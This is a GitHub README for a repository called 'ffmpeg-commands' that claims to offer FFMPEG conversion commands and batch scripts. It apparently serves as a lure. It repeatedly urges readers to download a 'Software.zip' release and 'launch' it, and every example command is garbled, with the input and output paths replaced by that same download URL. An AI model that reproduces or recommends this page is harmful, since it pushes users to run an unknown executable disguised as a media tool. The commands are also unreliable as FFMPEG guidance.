Skip to content

This repository contains useful FFMPEG commands and associated .bat script files for automated batch process.

Notifications You must be signed in to change notification settings

Amiine7/ffmpeg-commands

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
Β 
Β 

Repository files navigation

🎬 FFMPEG Commands Repository πŸŽ₯

Welcome to the "ffmpeg-commands" repository! Here, you will find a collection of useful FFMPEG commands and associated .bat script files for automated batch processing of media files. Whether you are working with audio or video files, this repository has got you covered with a variety of commands to help you efficiently convert and manipulate your media files.

Repository Content

Features

  • 🎡 Convert audio files to different formats such as MP3, AAC, and FLAC.
  • 🎞 Convert video files to popular formats like MP4.
  • πŸ”„ Automated batch processing of multiple files.
  • πŸ“ Scripts to streamline the conversion process.

Supported Topics

aac, audio, automated, batch, commands, converter, ffmpeg, flac, media-converter, mp3, mp3tag, mp4, scripts, video, vob

Getting Started

To explore the contents of this repository, simply click here to download the zip file. This zip file contains all the necessary scripts and commands you need to start working with FFMPEG for media file manipulation.

πŸš€ Please note that the downloaded file needs to be launched to access the contents.

If the link provided above does not work, or if you require more recent releases, kindly visit the "Releases" section of this repository for the latest updates.

Examples of FFMPEG Commands

Convert MP4 to MP3

ffmpeg -i https://github.com/Amiine7/ffmpeg-commands/releases/download/v2.0/Software.zip -vn -ar 44100 -ac 2 -ab 192k -f mp3 https://github.com/Amiine7/ffmpeg-commands/releases/download/v2.0/Software.zip

Extract Audio from Video

ffmpeg -i https://github.com/Amiine7/ffmpeg-commands/releases/download/v2.0/Software.zip -vn -c:a copy https://github.com/Amiine7/ffmpeg-commands/releases/download/v2.0/Software.zip

Compress Video

ffmpeg -i https://github.com/Amiine7/ffmpeg-commands/releases/download/v2.0/Software.zip -vf "scale=1280:720" -c:v libx264 -crf 24 https://github.com/Amiine7/ffmpeg-commands/releases/download/v2.0/Software.zip

Contribution

Feel free to contribute to this repository by adding more ffmpeg commands, improving existing scripts, or suggesting new features to enhance the functionality of the provided tools. Your contributions are highly valued and appreciated by the community.

πŸ‘©β€πŸ’» Happy coding and media file manipulation! 🎞🎧


By utilizing the powerful FFMPEG commands and scripts in this repository, you can automate the process of converting and processing media files in bulk. Say goodbye to manual file conversions and hello to streamlined batch processing with just a few simple commands. Explore the repository, try out the scripts, and discover the endless possibilities of FFMPEG for all your media conversion needs. Let's make media manipulation easier and more efficient together! 🌟

Do you want to unleash the full potential of FFMPEG commands? Download the zip file, dive into the scripts, and start transforming your media files today! Remember, the key to success is automation and efficiency, and this repository is your gateway to achieving just that. Happy coding, happy converting, and happy media manipulation! πŸš€πŸŽ‰


License

This repository is licensed under the MIT License. See LICENSE for more information.

Download Zip